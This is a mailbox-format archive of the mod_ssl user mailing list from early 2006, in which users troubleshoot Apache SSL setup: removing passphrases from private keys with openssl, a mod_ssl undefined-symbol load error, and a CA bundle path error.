Delivered-To: modssl-users@modssl.org
Received: from ns.villasenor.org (ns.villasenor.org [209.124.73.2])
	by master.modssl.org (Postfix) with ESMTP id 1BB8314D82A
	for ; Mon, 30 Jan 2006 13:51:05 +0100 (CET)
Received: from ns.villasenor.org (ns.villasenor.org [209.124.73.2])
	by ns.villasenor.org (8.12.9/8.12.8) with ESMTP id k0UCp3xg030675
	for ; Mon, 30 Jan 2006 07:51:03 -0500
Date: Mon, 30 Jan 2006 07:51:03 -0500 (EST)
From: Tony Villasenor 
To: modssl-users@modssl.org
Subject: Re: SSLPassPhraseDialog & several certificates
In-Reply-To: <43DE08CB.4090202@syshalt.com>
Message-ID: 
References: <43DBB9F4.4090503@syshalt.com> 
 <43DE08CB.4090202@syshalt.com>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Tony Villasenor 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


To remove the passphrase (on the key, not the certificate):

cp a.key temp
openssl rsa -in temp -out a.key




On Mon, 30 Jan 2006, Konstantin N. Bezruchenko wrote:

> Greetings,
>
> BJ Swope wrote:
>
> >>     So how can i use SSLPassPhraseDialog for 2 certificates what require
> >>     passwords?
> >
> > Why not save the certificates without passphrases?
>
> Because we already have password-protected certificates, and as i know
> we cant remove password protection from existing certificate.
>
> --
> Konstantin N. Bezruchenko | BK5536-RIPE
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jan 30 13:54:36 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 2BBD314D875; Mon, 30 Jan 2006 13:54:36 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from uproxy.gmail.com (uproxy.gmail.com [66.249.92.200])
	by master.modssl.org (Postfix) with ESMTP id 05FCD14D874
	for ; Mon, 30 Jan 2006 13:54:35 +0100 (CET)
Received: by uproxy.gmail.com with SMTP id k40so120093ugc
        for ; Mon, 30 Jan 2006 04:54:34 -0800 (PST)
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
        s=beta; d=gmail.com;
        h=received:message-id:date:from:sender:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references;
        b=CAoqnWy4BwDAH8ngO3QQrm3xwH8MxxfiZJGxrVu+dW8cJlyP4X1rmAxX72Ktyzp18lIJkraopUcSZCQNR3qod66XSQZB6vd95pnfLVJP1kaLEOlxiE52HiFAfavh4zz1qi5q5/guwTS2fQ/p0Qf9gMPY6QBbI6M4B1dBZUUepEo=
Received: by 10.49.34.14 with SMTP id m14mr731310nfj;
        Mon, 30 Jan 2006 04:54:33 -0800 (PST)
Received: by 10.49.28.20 with HTTP; Mon, 30 Jan 2006 04:54:33 -0800 (PST)
Message-ID: 
Date: Mon, 30 Jan 2006 07:54:33 -0500
From: Cliff Woolley 
To: modssl-users@modssl.org
Subject: Re: SSLPassPhraseDialog & several certificates
In-Reply-To: <43DE08CB.4090202@syshalt.com>
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline
References: <43DBB9F4.4090503@syshalt.com>
	 
	 <43DE08CB.4090202@syshalt.com>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On 1/30/06, Konstantin N. Bezruchenko  wrote:
> Because we already have password-protected certificates, and as i know
> we cant remove password protection from existing certificate.

That's not correct.  Your certificate is not password protected...
your private key is.  And you can definitely remove the password from
the private key.

>From the OpenSSL documentation:

To remove the pass phrase on an RSA private key:
    openssl rsa -in key.pem -out keyout.pem

To remove the pass phrase on a DSA private key:
    openssl dsa -in key.pem -out keyout.pem

Hope this helps.

--Cliff
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jan 30 13:57:41 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 849BD14D874; Mon, 30 Jan 2006 13:57:41 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mailfilter01.sogei.it (mailfilter01.sogei.it [217.175.51.61])
	by master.modssl.org (Postfix) with ESMTP id 2FF4F14D82A
	for ; Mon, 30 Jan 2006 13:57:40 +0100 (CET)
Received: from MAILBOX02.domus.ad.sogei.it ([26.2.193.135]) by SIA-FE1-CH5B01.domus.ad.sogei.it with Microsoft SMTPSVC(6.0.3790.1830);
	 Mon, 30 Jan 2006 13:57:17 +0100
Subject: R: SSLPassPhraseDialog & several certificates
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
Date: Mon, 30 Jan 2006 13:57:16 +0100
Content-class: urn:content-classes:message
X-MimeOLE: Produced By Microsoft Exchange V6.5
Message-ID: <344AB96B5B656F498D9211372DB5FE2B05C173@MAILBOX02.domus.ad.sogei.it>
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: SSLPassPhraseDialog & several certificates
thread-index: AcYlmiET+wK4xo7XSnyF/YV6658cggAAXkug
From: "CAMPETTO CLAUDIO" 
To: 
X-OriginalArrivalTime: 30 Jan 2006 12:57:17.0169 (UTC) FILETIME=[B2CF3E10:01C6259C]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "CAMPETTO CLAUDIO" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

You can remove the password with the command
openssl rsa -in name_of_the_file_with_the_password-protected_private_key =
-out name_of_the_file_without_password
In the output file there is just the private key, so if in the original =
file contains also the certificate, you have to concatenate the =
decrypted private key with the certificate.

Claudio Campetto

> -----Messaggio originale-----
> Da: owner-modssl-users@modssl.org =
[mailto:owner-modssl-users@modssl.org]
> Per conto di Konstantin N. Bezruchenko
> Inviato: luned=EC 30 gennaio 2006 13.39
> A: modssl-users@modssl.org
> Oggetto: Re: SSLPassPhraseDialog & several certificates
>=20
> Greetings,
>=20
> BJ Swope wrote:
>=20
> >>     So how can i use SSLPassPhraseDialog for 2 certificates what
> require
> >>     passwords?
> >
> > Why not save the certificates without passphrases?
>=20
> Because we already have password-protected certificates, and as i know
> we cant remove password protection from existing certificate.
>=20
> --
> Konstantin N. Bezruchenko | BK5536-RIPE
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jan 31 14:55:42 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 05BF914D874; Tue, 31 Jan 2006 14:55:42 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from uproxy.gmail.com (uproxy.gmail.com [66.249.92.198])
	by master.modssl.org (Postfix) with ESMTP id 54AA214D82D
	for ; Tue, 31 Jan 2006 14:55:40 +0100 (CET)
Received: by uproxy.gmail.com with SMTP id k40so263526ugc
        for ; Tue, 31 Jan 2006 05:55:39 -0800 (PST)
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
        s=beta; d=gmail.com;
        h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:references;
        b=WFjZCgVYCUPPHD0YwowGIgVVzjGFn11oOLAfaPxjIC9YwK+G0sSU78ertImvykZf+9GkotZ6iNZlleWAaT4B+eQNgOaT5+5KSF1mncVtVSBDMEy6YC9v0nkWL1jBcVpOkgdTP1njKFCnAp2zcy+La+uo1usZ4QBC7y9ZkFxLlmo=
Received: by 10.49.9.7 with SMTP id m7mr1152555nfi;
        Tue, 31 Jan 2006 05:55:39 -0800 (PST)
Received: by 10.49.11.6 with HTTP; Tue, 31 Jan 2006 05:55:38 -0800 (PST)
Message-ID: 
Date: Tue, 31 Jan 2006 08:55:38 -0500
From: BJ Swope 
To: modssl-users@modssl.org
Subject: Re: SSLPassPhraseDialog & several certificates
In-Reply-To: 
MIME-Version: 1.0
Content-Type: multipart/alternative; 
	boundary="----=_Part_18799_14095359.1138715738996"
References: <43DBB9F4.4090503@syshalt.com>
	 
	 <43DE08CB.4090202@syshalt.com>
	 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: BJ Swope 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

------=_Part_18799_14095359.1138715738996
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline

On 1/30/06, Cliff Woolley  wrote:
>
> On 1/30/06, Konstantin N. Bezruchenko  wrote:
> > Because we already have password-protected certificates, and as i know
> > we cant remove password protection from existing certificate.
>
> That's not correct.  Your certificate is not password protected...
> your private key is.  And you can definitely remove the password from
> the private key.
>
> From the OpenSSL documentation:
>
> To remove the pass phrase on an RSA private key:
>     openssl rsa -in key.pem -out keyout.pem
>
> To remove the pass phrase on a DSA private key:
>     openssl dsa -in key.pem -out keyout.pem


Thanks for the correction.  Guess I was close but no cigar...



--
"But we also know the dangers of a religion that severs its links with
reason and becomes prey to fundamentalism" --  Cardinal Paul Poupard
"It morphs into the Republican party!"  -- BJ

------=_Part_18799_14095359.1138715738996
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline



On 1/30/06, Cliff Woolley <jwooll=
ey@apache.org> wrote:

On 1/30/06, Konstantin N. Bezruchenko <bk@syshalt.com> wrote:
> Because we already have password-pro=
tected certificates, and as i know
> we cant remove password protecti=
on from existing certificate.


That's not correct.  Your certificate is not password pro=
tected...
your private key is.  And you can definitely remove =
the password from
the private key.

From the OpenSSL documentation=
:

To remove the pass phrase on an RSA private key:

    openssl rsa -in key.pem -out keyout.pem

=
To remove the pass phrase on a DSA private key:
    =
openssl dsa -in key.pem -out keyout.pem


Thanks for the correction.  Guess I was close but no cigar... 





-- 
"But we also know the
dangers of a religion that severs its links with reason and becomes
prey to fundamentalism" --  Cardinal Paul Poupard
"I=
t morphs into the Republican party!"  -- BJ

------=_Part_18799_14095359.1138715738996--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Feb  7 11:30:48 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 91CEB14D83D; Tue,  7 Feb 2006 11:30:48 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mx3.ccw.gov.uk (mx3.ccw.gov.uk [194.83.155.67])
	by master.modssl.org (Postfix) with ESMTP id 3393214D82A
	for ; Tue,  7 Feb 2006 11:30:47 +0100 (CET)
Received: from [192.168.253.7] (helo=host3.hq.ccw.gov.uk)
	by mx3.ccw.gov.uk with esmtp (Exim 4.51)
	id 1F6Q7S-0001Ql-3J
	for modssl-users@modssl.org; Tue, 07 Feb 2006 10:30:46 +0000
Received: from gwia3.hq.ccw.gov.uk ([192.168.24.78] helo=gwia3.ccw.gov.uk)
	by host3.hq.ccw.gov.uk with esmtp (Exim 4.14)
	id 1F6Qpe-0007Jr-M1
	for modssl-users@modssl.org; Tue, 07 Feb 2006 11:16:26 +0000
Received: from CCW_GWIA3-MTA by gwia3.ccw.gov.uk
	with Novell_GroupWise; Tue, 07 Feb 2006 10:24:56 +0000
Message-Id: <43E876C4.AC0B.0006.3@ccw.gov.uk>
X-Mailer: Novell GroupWise Internet Agent 7.0 
Date: Tue, 07 Feb 2006 10:30:28 +0000
From: "Gordon Ross" 
To: 
Subject: undefined symbol: RSA_generate_key
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Gordon Ross" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I've got a Linux box with OpenSSL 0.9.8a installed (configured with
threads, zlib & shared) I then configured and installed Apache 2.0.55
with SSL support (configure --enable-ssl --enable-mods-shared=all)

When I try and start Apache, (httpd -D SSL) I get the error:

Cannot load (path)/mod_ssl.so into server (path)/mod_ssl.so: undefined
symbol: RSA_Generate_key

Suggestions ?

Thanks,

GTG
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Feb  7 20:48:58 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 7022B14D847; Tue,  7 Feb 2006 20:48:58 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from pythagoras.numenet.com (dcn251-10.dcn.davis.ca.us [168.150.251.10])
	by master.modssl.org (Postfix) with ESMTP id E683114D82A
	for ; Tue,  7 Feb 2006 20:48:57 +0100 (CET)
Received: from localhost (localhost.localdomain [127.0.0.1])
	by pythagoras.numenet.com (Postfix) with ESMTP id EA7EA7C5FD
	for ; Tue,  7 Feb 2006 11:45:43 -0800 (PST)
Received: from pythagoras.numenet.com ([127.0.0.1])
 by localhost (pythagoras.numenet.com [127.0.0.1]) (amavisd-new, port 10024)
 with ESMTP id 14169-08 for ;
 Tue,  7 Feb 2006 11:45:42 -0800 (PST)
Received: from Blackbird.numenet.com (c-24-23-165-233.hsd1.ca.comcast.net [24.23.165.233])
	by pythagoras.numenet.com (Postfix) with ESMTP id CA7A07C5F9
	for ; Tue,  7 Feb 2006 11:45:41 -0800 (PST)
Message-Id: <5.1.0.14.2.20060207114706.0595fe48@pythagoras.numenet.com>
X-Sender: liamk@pythagoras.numenet.com
X-Mailer: QUALCOMM Windows Eudora Version 5.1
Date: Tue, 07 Feb 2006 11:48:51 -0800
To: modssl-users@modssl.org
From: Liam Kirsher 
Subject: SSLCACertificateFile crashes Apache
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"; format=flowed
X-Virus-Scanned: amavisd-new at numenet.com
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Liam Kirsher 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi --

I'm experiencing a problem setting up SSL using mod_ssl.

I'm trying to get ssl running on my client's ISP-hosted virtual server:
Apache/1.3.27 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.12 OpenSSL/0.9.6b PHP/4.4.1

I have a cert from Comodo.

SSL works properly for my recent browsers (Firefox 1.07, IE 6.0) but an 
older version of Opera doesn't recognize the cert and prompts the user to 
accept it.

That situation should be fixed by installing the ca-bundle file supplied by 
Comodo, and setting the SSLCACertificateFile parameter in httpd.conf.

However, when I add the line
SSLCACertificateFile    /path/to/comodo-ca-bundle

Apache dies when restarting, and logs the following OpenSSL errors:

>[07/Feb/2006 11:57:08 25653] [error] Init: (www.domain.com:443) Unable to 
>configure verify locations for client authentication (OpenSSL library 
>error follows)
>[07/Feb/2006 11:57:08 25653] [error] OpenSSL: error:02001002:system 
>library:fopen:No such file or directory
>[07/Feb/2006 11:57:08 25653] [error] OpenSSL: error:2006D002:BIO 
>routines:BIO_new_file:system lib
>[07/Feb/2006 11:57:08 25653] [error] OpenSSL: error:0E064002:configuration 
>file routines:CONF_load:system lib
>[07/Feb/2006 11:57:08 25653] [error] OpenSSL: error:0906D06C:PEM 
>routines:PEM_read_bio:no start line [Hint: Bad file contents or format - 
>or even just a forgotten SSLCertificateKeyFile?]
>[07/Feb/2006 11:57:08 25653] [error] OpenSSL: error:0B084009:x509 
>certificate routines:X509_load_cert_crl_file:missing asn1 eos

I'm not sure what all that means. The SSLCertificateKeyFile is there, and 
it works fine as long as there is no mention of SSLCACertificateFile.

Note that openssl itself is not installed on the server. The ISP has an 
interface for generating the csr and creating the key. The second time I 
generated the files on another similar server, but the end result is the same.
I'm wondering if possibly openssl is looking for its configuration file 
openssl.cnf, and that is what is not being found.

Any ideas?

Liam



Liam Kirsher 
415-456-4420
415-438-0384 (cell)
PGP: http://liam.numenet.com/pgp/


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Feb  7 23:09:56 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 2AEA414D831; Tue,  7 Feb 2006 23:09:56 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from uproxy.gmail.com (uproxy.gmail.com [66.249.92.199])
	by master.modssl.org (Postfix) with ESMTP id D8F5314D82A
	for ; Tue,  7 Feb 2006 23:09:55 +0100 (CET)
Received: by uproxy.gmail.com with SMTP id k40so30140ugc
        for ; Tue, 07 Feb 2006 14:09:53 -0800 (PST)
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
        s=beta; d=gmail.com;
        h=received:message-id:date:from:sender:to:subject:in-reply-to:mime-version:content-type:references;
        b=GBfdkm06EvEsV+IiWXFUM4BjqzZshFdIcyVky2eEzwgC3Q1a+DN0o/Ytf7h/oeqQcjqAztCDWgPuYkHdirUHF31CRE+RisljnYO06U9nwiy9vHez6v+BFCo8ZIwFcxvOaNZaOeCISbbugdsB0igGdCuWXoGTwOiMLkFWzw0HxZc=
Received: by 10.49.34.18 with SMTP id m18mr1716753nfj;
        Tue, 07 Feb 2006 14:02:43 -0800 (PST)
Received: by 10.49.28.20 with HTTP; Tue, 7 Feb 2006 14:02:43 -0800 (PST)
Message-ID: 
Date: Tue, 7 Feb 2006 17:02:43 -0500
From: Cliff Woolley 
To: modssl-users@modssl.org
Subject: Re: undefined symbol: RSA_generate_key
In-Reply-To: <43E876C4.AC0B.0006.3@ccw.gov.uk>
MIME-Version: 1.0
Content-Type: multipart/alternative; 
	boundary="----=_Part_5182_12820168.1139349763015"
References: <43E876C4.AC0B.0006.3@ccw.gov.uk>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

------=_Part_5182_12820168.1139349763015
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline

On 2/7/06, Gordon Ross  wrote:
> I've got a Linux box with OpenSSL 0.9.8a installed (configured with
> threads, zlib & shared) I then configured and installed Apache 2.0.55
> with SSL support (configure --enable-ssl --enable-mods-shared=3Dall)
>
> When I try and start Apache, (httpd -D SSL) I get the error:
>
> Cannot load (path)/mod_ssl.so into server (path)/mod_ssl.so: undefined
> symbol: RSA_Generate_key

It's highly likely this is the same problem described by me long long ago o=
n
this forum related to X509_free being undefined.  Take a look at this:

http://www.mail-archive.com/modssl-users@modssl.org/msg14344.html

The short short version is that you should try recompiling apache with
--enable-ssl=3Dstatic .

--Cliff

------=_Part_5182_12820168.1139349763015
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline

On 2/7/06, Gordon Ross <G.Ross@ccw.=
gov.uk> wrote:
> I've got a Linux box with OpenSSL 0.9.8a inst=
alled (configured with
> threads, zlib & shared) I then configure=
d and installed Apache=20
2.0.55
> with SSL support (configure --enable-ssl --enable-mods-share=
d=3Dall)
> 
> When I try and start Apache, (httpd -D SSL) I get=
 the error:
> 
> Cannot load (path)/mod_ssl.so into server (pat=
h)/mod_ssl.so: undefined

> symbol: RSA_Generate_key

It's highly likely this is the sam=
e problem described by me long long ago on this forum related to X509_free =
being undefined.  Take a look at this:


http://www.mail-archive.com/modssl-users@modssl.org/msg14344.html
The short short version is that you should try recompiling apache with --=
enable-ssl=3Dstatic .

--Cliff


------=_Part_5182_12820168.1139349763015--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Feb  7 23:30:49 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 0EF9914D831; Tue,  7 Feb 2006 23:30:49 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mx1.redhat.com (mx1.redhat.com [66.187.233.31])
	by master.modssl.org (Postfix) with ESMTP id A412F14D82A
	for ; Tue,  7 Feb 2006 23:30:48 +0100 (CET)
Received: from int-mx1.corp.redhat.com (int-mx1.corp.redhat.com [172.16.52.254])
	by mx1.redhat.com (8.12.11/8.12.11) with ESMTP id k17MUNtG013230;
	Tue, 7 Feb 2006 17:30:23 -0500
Received: from radish.cambridge.redhat.com (radish.cambridge.redhat.com [172.16.18.90])
	by int-mx1.corp.redhat.com (8.11.6/8.11.6) with ESMTP id k17MUN103837;
	Tue, 7 Feb 2006 17:30:23 -0500
Received: (from jorton@localhost)
	by radish.cambridge.redhat.com (8.13.4/8.13.4/Submit) id k17MULwd027144;
	Tue, 7 Feb 2006 22:30:21 GMT
Date: Tue, 7 Feb 2006 22:30:21 +0000
From: Joe Orton 
To: Cliff Woolley 
Cc: modssl-users@modssl.org
Subject: Re: undefined symbol: RSA_generate_key
Message-ID: <20060207223021.GA27112@redhat.com>
Mail-Followup-To: Cliff Woolley ,
	modssl-users@modssl.org
References: <43E876C4.AC0B.0006.3@ccw.gov.uk> 
Mime-Version: 1.0
Content-Type: text/plain; charset=utf-8
Content-Disposition: inline
In-Reply-To: 
User-Agent: Mutt/1.4.2.1i
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Joe Orton 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Tue, Feb 07, 2006 at 05:02:43PM -0500, Cliff Woolley wrote:
> On 2/7/06, Gordon Ross  wrote:
> > I've got a Linux box with OpenSSL 0.9.8a installed (configured with
> > threads, zlib & shared) I then configured and installed Apache 2.0.55
> > with SSL support (configure --enable-ssl --enable-mods-shared=all)
> >
> > When I try and start Apache, (httpd -D SSL) I get the error:
> >
> > Cannot load (path)/mod_ssl.so into server (path)/mod_ssl.so: undefined
> > symbol: RSA_Generate_key
> 
> It's highly likely this is the same problem described by me long long ago on
> this forum related to X509_free being undefined.  Take a look at this:
> 
> http://www.mail-archive.com/modssl-users@modssl.org/msg14344.html
> 
> The short short version is that you should try recompiling apache with
> --enable-ssl=static .

Or upgrade to 2.2, which fixes this problem ;)

joe
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Feb  8 03:33:13 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 1046214D853; Wed,  8 Feb 2006 03:33:13 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from uproxy.gmail.com (uproxy.gmail.com [66.249.92.203])
	by master.modssl.org (Postfix) with ESMTP id 75D9914D835
	for ; Wed,  8 Feb 2006 03:33:11 +0100 (CET)
Received: by uproxy.gmail.com with SMTP id q2so231112uge
        for ; Tue, 07 Feb 2006 18:33:09 -0800 (PST)
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
        s=beta; d=gmail.com;
        h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:references;
        b=Hytpa1CtcziZT/NV5aYE1nuEslzFStuzE1CLVTzhw4t9JzRZgC35M+E+/tr+XnPmrbFwAiMQf8kLyIR0ZIQZA+R7Oj3CNBcGTuJYxHANro/xSvu9/D2tRO8rcHfZ4sn5diE23li+QBJGh5AStvLBg34K0CwFua/3lDRGruFMlZw=
Received: by 10.48.244.9 with SMTP id r9mr1711146nfh;
        Tue, 07 Feb 2006 18:33:09 -0800 (PST)
Received: by 10.49.11.6 with HTTP; Tue, 7 Feb 2006 18:33:09 -0800 (PST)
Message-ID: 
Date: Tue, 7 Feb 2006 21:33:09 -0500
From: BJ Swope 
To: modssl-users@modssl.org
Subject: Re: SSLCACertificateFile crashes Apache
In-Reply-To: <5.1.0.14.2.20060207114706.0595fe48@pythagoras.numenet.com>
MIME-Version: 1.0
Content-Type: multipart/alternative; 
	boundary="----=_Part_1179_21668694.1139365989305"
References: <5.1.0.14.2.20060207114706.0595fe48@pythagoras.numenet.com>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: BJ Swope 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

------=_Part_1179_21668694.1139365989305
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline

On 2/7/06, Liam Kirsher  wrote:
>
>
>
>
> >[07/Feb/2006 11:57:08 25653] [error] OpenSSL: error:02001002:system
> library:fopen:No such file or directory



Are you sure the path is correct?  Is the path relative or absolute as you
indicated in your post?


--
"But we also know the dangers of a religion that severs its links with
reason and becomes prey to fundamentalism" --  Cardinal Paul Poupard
"It morphs into the Republican party!"  -- BJ

------=_Part_1179_21668694.1139365989305
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline



On 2/7/06, Liam Kirsher <liamk@nume=
net.com> wrote:




>[07/Feb/2006 11:57:08 25653] [error] OpenSSL: error:0200100=
2:system library:fopen:No such file or directory




Are you sure the path is correct?  Is the path relative or absolute as=
 you indicated in your post? 




-- 
"But we also know the dangers of a religion
that severs its links with reason and becomes prey to fundamentalism"
--  Cardinal Paul Poupard
"It morphs into the Republican =
party!"  -- BJ

------=_Part_1179_21668694.1139365989305--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Feb  8 11:45:36 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 0217414D84A; Wed,  8 Feb 2006 11:45:36 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mx3.ccw.gov.uk (mx3.ccw.gov.uk [194.83.155.67])
	by master.modssl.org (Postfix) with ESMTP id BA10314D835
	for ; Wed,  8 Feb 2006 11:45:35 +0100 (CET)
Received: from [192.168.253.7] (helo=host3.hq.ccw.gov.uk)
	by mx3.ccw.gov.uk with esmtp (Exim 4.51)
	id 1F6mpJ-0005SU-7z
	for modssl-users@modssl.org; Wed, 08 Feb 2006 10:45:33 +0000
Received: from gwia3.hq.ccw.gov.uk ([192.168.24.78] helo=gwia3.ccw.gov.uk)
	by host3.hq.ccw.gov.uk with esmtp (Exim 4.14)
	id 1F6nXa-0006bD-8d
	for modssl-users@modssl.org; Wed, 08 Feb 2006 11:31:18 +0000
Received: from CCW_GWIA3-MTA by gwia3.ccw.gov.uk
	with Novell_GroupWise; Wed, 08 Feb 2006 10:39:43 +0000
Message-Id: <43E9CBB8.AC0B.0006.3@ccw.gov.uk>
X-Mailer: Novell GroupWise Internet Agent 7.0 
Date: Wed, 08 Feb 2006 10:45:12 +0000
From: "Gordon Ross" 
To: 
Subject: Re: undefined symbol: RSA_generate_key
References: <43E876C4.AC0B.0006.3@ccw.gov.uk> 
In-Reply-To: 
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Gordon Ross" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

>>> On 07 February 2006 at 22:02:43, in message
,
jwoolley@apache.org wrote:
> On 2/7/06, Gordon Ross  wrote:
>> I've got a Linux box with OpenSSL 0.9.8a installed (configured with
>> threads, zlib & shared) I then configured and installed Apache
2.0.55
>> with SSL support (configure --enable-ssl --enable-mods-shared=all)
>>
>> When I try and start Apache, (httpd -D SSL) I get the error:
>>
>> Cannot load (path)/mod_ssl.so into server (path)/mod_ssl.so:
undefined
>> symbol: RSA_Generate_key
> 
> It's highly likely this is the same problem described by me long long
